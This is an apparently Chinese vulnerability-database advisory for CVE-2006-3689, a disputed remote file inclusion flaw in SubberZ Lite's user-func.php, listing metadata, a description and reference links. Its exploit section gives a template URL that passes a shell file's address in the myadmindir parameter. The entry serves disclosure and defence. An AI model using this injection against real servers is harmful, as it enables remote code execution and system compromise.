Subberz Lite UserFunc 'user-func.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110608 漏洞类型 输入验证
发布时间 2006-07-14 更新时间 2006-08-02
CVE编号 CVE-2006-3689 CNNVD-ID CNNVD-200607-316
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28223
https://cxsecurity.com/issue/WLB-2006070083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-316
|漏洞详情
**有争议**CodeworksGnomediaSubberZ[Lite]的user-func.php存在PHP远程文件包含漏洞,远程攻击者可借助myadmindir参数中的URL执行任意PHP代码。注:第三方对此问题提出质疑,声称"myadmindir变量在所有GET变量得到处理之前进行设置。"
|漏洞EXP
source: http://www.securityfocus.com/bid/18990/info

SubberZ[Lite] is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

http://www.example.com[site]/[path]/user-func.php?myadmindir=[Shell]
|参考资料

来源:XF
名称:subberzlite-userfunc-file-include(27748)
链接:http://xforce.iss.net/xforce/xfdb/27748
来源:BID
名称:18990
链接:http://www.securityfocus.com/bid/18990
来源:BUGTRAQ
名称:20060717Re:SubberZ[Lite]-RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/440864/100/100/threaded
来源:BUGTRAQ
名称:20060714SubberZ[Lite]-RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/440139/100/0/threaded
来源:OSVDB
名称:28592
链接:http://www.osvdb.org/28592
来源:SREASON
名称:1246
链接:http://securityreason.com/securityalert/1246